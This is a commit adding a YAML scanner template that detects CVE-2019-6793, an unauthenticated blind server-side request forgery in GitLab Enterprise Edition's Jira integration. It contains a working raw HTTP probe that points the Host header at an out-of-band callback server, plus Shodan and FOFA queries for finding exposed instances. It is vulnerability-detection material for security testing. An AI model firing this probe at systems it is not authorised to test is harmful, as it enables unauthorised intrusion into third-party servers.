Create CVE-2019-6793.yaml

2024-09-25 11:57:28 +04:00 · 2024-09-25 11:57:28 +04:00 · 4e24a26a81
parent 3af1bce032
commit 4e24a26a81
1 changed files with 49 additions and 0 deletions
--- a/http/cves/2019/CVE-2019-6793.yaml
+++ b/http/cves/2019/CVE-2019-6793.yaml
@ -0,0 +1,49 @@
+id: CVE-2019-6793
+
+info:
+  name: GitLab Enterprise Edition - Server-Side request Forgery
+  author: ritikchaddha
+  severity: high
+  description: |
+    An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
+  reference:
+    - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/50748
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-6793
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
+    cvss-score: 7.0
+    cve-id: CVE-2019-6793
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
+  metadata:
+    max-request: 2
+    vendor: gitlab
+    product: gitlab
+    shodan-query: html:"GitLab Enterprise Edition"
+    fofa-query: body="GitLab Enterprise Edition"
+  tags: cve,cve2019,gitlab,enterprise,ssrf,blind
+
+http:
+  - raw:
+      - |+
+        POST /-/jira/login/oauth/access_token HTTP/1.1
+        Host: {{interactsh-url}}
+
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "access_token="
+        condition: or
+
+      - type: status
+        status:
+          - 200